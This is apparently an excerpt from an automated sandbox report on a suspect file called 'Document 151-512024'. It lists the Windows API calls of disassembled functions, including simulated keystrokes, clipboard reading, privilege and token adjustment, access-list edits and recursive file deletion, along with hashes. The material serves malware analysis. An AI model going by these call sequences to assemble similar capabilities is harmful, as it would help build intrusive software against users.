                                                                                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 009D4908
                                                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 009D4927
                                                                                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 009D494B
                                                                                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 009D495C
                                                                                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 009D497B
                                                                                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009D49AE
                                                                                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009D49D4
                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 009D4A0F
                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 009D4A56
                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 009D4A7E
                                                                                                    • IsMenu.USER32(?), ref: 009D4A97
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009D4AF2
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009D4B20
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 009D4B94
                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 009D4BE3
                                                                                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 009D4C82
                                                                                                    • wsprintfW.USER32 ref: 009D4CAE
                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009D4CC9
                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 009D4CF1
                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009D4D13
                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009D4D33
                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 009D4D5A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                    • String ID: %d/%02d/%02d$0n
                                                                                                    • API String ID: 4054740463-2744937282
                                                                                                    • Opcode ID: 55eafbb5a3154e25af30cf7ea47213d644c1c6d3b4feb32d3ce3f76e07cbea69
                                                                                                    • Instruction ID: 5792380016617b84cfe2641a9feb4671b30f1c511f9fe8827befe958d1be7b4d
                                                                                                    • Opcode Fuzzy Hash: 55eafbb5a3154e25af30cf7ea47213d644c1c6d3b4feb32d3ce3f76e07cbea69
                                                                                                    • Instruction Fuzzy Hash: 6012F371680215ABEB248F29CC49FAE7BF8EF85710F10852AF915EB2E1DB74D941CB50
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0095F998
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0099F474
                                                                                                    • IsIconic.USER32(00000000), ref: 0099F47D
                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 0099F48A
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0099F494
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0099F4AA
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0099F4B1
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0099F4BD
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0099F4CE
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0099F4D6
                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0099F4DE
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0099F4E1
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0099F4F6
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0099F501
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0099F50B
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0099F510
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0099F519
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0099F51E
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0099F528
                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0099F52D
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0099F530
                                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0099F557
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                    • Opcode ID: 547179e578ee333c0cbc4836b91a901deec7529214d82335e4ba38e542b92ccb
                                                                                                    • Instruction ID: 189e9b94de789fe7342b1295faa2ceaab490d95f8e083527c5e9392909e8e5e9
                                                                                                    • Opcode Fuzzy Hash: 547179e578ee333c0cbc4836b91a901deec7529214d82335e4ba38e542b92ccb
                                                                                                    • Instruction Fuzzy Hash: 2531A1B1A94219BBEF206BB55C4AFBF7F6CEB44B50F100026FA00E61D1C6B09D40FA61
                                                                                                    APIs
                                                                                                      • Part of subcall function 009A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009A170D
                                                                                                      • Part of subcall function 009A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009A173A
                                                                                                      • Part of subcall function 009A16C3: GetLastError.KERNEL32 ref: 009A174A
                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 009A1286
                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009A12A8
                                                                                                    • CloseHandle.KERNEL32(?), ref: 009A12B9
                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009A12D1
                                                                                                    • GetProcessWindowStation.USER32 ref: 009A12EA
                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 009A12F4
                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009A1310
                                                                                                      • Part of subcall function 009A10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009A11FC), ref: 009A10D4
                                                                                                      • Part of subcall function 009A10BF: CloseHandle.KERNEL32(?,?,009A11FC), ref: 009A10E9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                    • String ID: $default$winsta0
                                                                                                    • API String ID: 22674027-1027155976
                                                                                                    • Opcode ID: 6e131db3190dbd31670052d4054f358b2db4f0fc2cd921e4e37fef413a7e06fc
                                                                                                    • Instruction ID: 901b5cd08d78c5b4bd53e286a235b6336cbcaba0eb442eb90755d5abf418741d
                                                                                                    • Opcode Fuzzy Hash: 6e131db3190dbd31670052d4054f358b2db4f0fc2cd921e4e37fef413a7e06fc
                                                                                                    • Instruction Fuzzy Hash: 9881A0B1944209AFDF119FA8DC49FEE7BBDEF49704F14412AF910E61A0C7358984DBA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 009A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009A1114
                                                                                                      • Part of subcall function 009A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1120
                                                                                                      • Part of subcall function 009A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A112F
                                                                                                      • Part of subcall function 009A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1136
                                                                                                      • Part of subcall function 009A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009A114D
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009A0BCC
                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009A0C00
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 009A0C17
                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 009A0C51
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009A0C6D
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 009A0C84
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009A0C8C
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 009A0C93
                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009A0CB4
                                                                                                    • CopySid.ADVAPI32(00000000), ref: 009A0CBB
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009A0CEA
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009A0D0C
                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009A0D1E
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0D45
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A0D4C
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0D55
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A0D5C
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0D65
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A0D6C
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 009A0D78
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A0D7F
                                                                                                      • Part of subcall function 009A1193: GetProcessHeap.KERNEL32(00000008,009A0BB1,?,00000000,?,009A0BB1,?), ref: 009A11A1
                                                                                                      • Part of subcall function 009A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009A0BB1,?), ref: 009A11A8
                                                                                                      • Part of subcall function 009A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009A0BB1,?), ref: 009A11B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 4175595110-0
                                                                                                    • Opcode ID: 6fa2a1f179d2427795ab1aefd42c160f96ce6db57f0576b5e285144a6cc6ba35
                                                                                                    • Instruction ID: 84b21a76848100677ed38287b95589f14d763d9d7afe3c4083db26416c2974a0
                                                                                                    • Opcode Fuzzy Hash: 6fa2a1f179d2427795ab1aefd42c160f96ce6db57f0576b5e285144a6cc6ba35
                                                                                                    • Instruction Fuzzy Hash: 9371AAB690421AEBDF10DFA4DC44FAEBBBCBF45310F04421AF914A7290D771AA45CBA0
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32(009DCC08), ref: 009BEB29
                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 009BEB37
                                                                                                    • GetClipboardData.USER32(0000000D), ref: 009BEB43
                                                                                                    • CloseClipboard.USER32 ref: 009BEB4F
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 009BEB87
                                                                                                    • CloseClipboard.USER32 ref: 009BEB91
                                                                                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 009BEBBC
                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 009BEBC9
                                                                                                    • GetClipboardData.USER32(00000001), ref: 009BEBD1
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 009BEBE2
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?), ref: 009BEC22
                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 009BEC38
                                                                                                    • GetClipboardData.USER32(0000000F), ref: 009BEC44
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 009BEC55
                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 009BEC77
                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009BEC94
                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009BECD2
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?), ref: 009BECF3
                                                                                                    • CountClipboardFormats.USER32 ref: 009BED14
                                                                                                    • CloseClipboard.USER32 ref: 009BED59
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 420908878-0
                                                                                                    • Opcode ID: a9f588f16c68cc6170008c04da25b97b94edb7cc26111cf520177acc7c604f51
                                                                                                    • Instruction ID: 752604757618098956ab45a487c80ea2dbec32c2d95c09fce2420c1279eb8d2c
                                                                                                    • Opcode Fuzzy Hash: a9f588f16c68cc6170008c04da25b97b94edb7cc26111cf520177acc7c604f51
                                                                                                    • Instruction Fuzzy Hash: 0461E174248202AFD300EF24C988FAAB7ECEF84724F54451EF496972A2CB71DD45DB62
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 009B69BE
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009B6A12
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009B6A4E
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009B6A75
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 009B6AB2
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 009B6ADF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                    • Opcode ID: 1176fcfcc03054b3ecd0e3ce3d0a534a95fc8429c382dfecd2faf77b3941c7a1
                                                                                                    • Instruction ID: a748f4c39b381873f36ca1365c77cffd1071ced8d6a54972ddceae19241d73af
                                                                                                    • Opcode Fuzzy Hash: 1176fcfcc03054b3ecd0e3ce3d0a534a95fc8429c382dfecd2faf77b3941c7a1
                                                                                                    • Instruction Fuzzy Hash: 5FD151B2508304AEC710EBA4D991EAFB7ECAFC8704F44491DF589D7191EB74DA48CB62
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 009B9663
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 009B96A1
                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 009B96BB
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009B96D3
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009B96DE
                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 009B96FA
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009B974A
                                                                                                    • SetCurrentDirectoryW.KERNEL32(00A06B7C), ref: 009B9768
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009B9772
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009B977F
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009B978F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1409584000-438819550
                                                                                                    • Opcode ID: 4aadd8be2fd8ee8fd2506eb16fd7f2613901032f6658f54159494faf91582595
                                                                                                    • Instruction ID: e29ca51d24593e0060daa9caf174e8ea30d3ef915d7b9a912486d3647d06ad97
                                                                                                    • Opcode Fuzzy Hash: 4aadd8be2fd8ee8fd2506eb16fd7f2613901032f6658f54159494faf91582595
                                                                                                    • Instruction Fuzzy Hash: 9531F5B25A520A7ECF10AFB4ED88ADE77ECAF49330F104556FA14E2190DB34DD80DA50
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 009B97BE
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009B9819
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009B9824
                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 009B9840
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009B9890
                                                                                                    • SetCurrentDirectoryW.KERNEL32(00A06B7C), ref: 009B98AE
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009B98B8
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009B98C5
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009B98D5
                                                                                                      • Part of subcall function 009ADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009ADB00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 2640511053-438819550
                                                                                                    • Opcode ID: c2dcc7dd137360355872ef6e9546de34bd8241b2dcb6ff73d5a14198b077d08a
                                                                                                    • Instruction ID: 48a746a1bf56d7c54ec340153cac53929e9ce20894cbff7944a4d1b1a458d1d5
                                                                                                    • Opcode Fuzzy Hash: c2dcc7dd137360355872ef6e9546de34bd8241b2dcb6ff73d5a14198b077d08a
                                                                                                    • Instruction Fuzzy Hash: C231127159121A7EDF10EFB4ED88ADE77BCAF46334F108556EA14A21E0DB30DA84DA60
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 009B8257
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 009B8267
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009B8273
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009B8310
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009B8324
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009B8356
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009B838C
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009B8395
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1464919966-438819550
                                                                                                    • Opcode ID: d20215fac5cb86c3cddba4eeae531bce7868fec19bdaa222160dfe0c4594c400
                                                                                                    • Instruction ID: bac26e4eea318a96a889b36e9f872372b278458c84d15b5517b03705c225cc96
                                                                                                    • Opcode Fuzzy Hash: d20215fac5cb86c3cddba4eeae531bce7868fec19bdaa222160dfe0c4594c400
                                                                                                    • Instruction Fuzzy Hash: C36149B25083459FCB10EF64C844AAFB3ECFF89324F04491AF99997251DB35E945CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00943AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00943A97,?,?,00942E7F,?,?,?,00000000), ref: 00943AC2
                                                                                                      • Part of subcall function 009AE199: GetFileAttributesW.KERNEL32(?,009ACF95), ref: 009AE19A
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 009AD122
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 009AD1DD
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 009AD1F0
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 009AD20D
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009AD237
                                                                                                      • Part of subcall function 009AD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,009AD21C,?,?), ref: 009AD2B2
                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 009AD253
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009AD264
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                    • Opcode ID: c75acefe9f1c5c330a550d057c33b601527c41eb21959022112dae95590c6bff
                                                                                                    • Instruction ID: 32a07536020ce169c15998d4aa918b66eb007bbaed53c71f2c2de38db17c9fe2
                                                                                                    • Opcode Fuzzy Hash: c75acefe9f1c5c330a550d057c33b601527c41eb21959022112dae95590c6bff
                                                                                                    • Instruction Fuzzy Hash: 8F61617184610D9FCF05EBE0D952EEDB779AF96300F204165E41277192EB309F09DBA0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
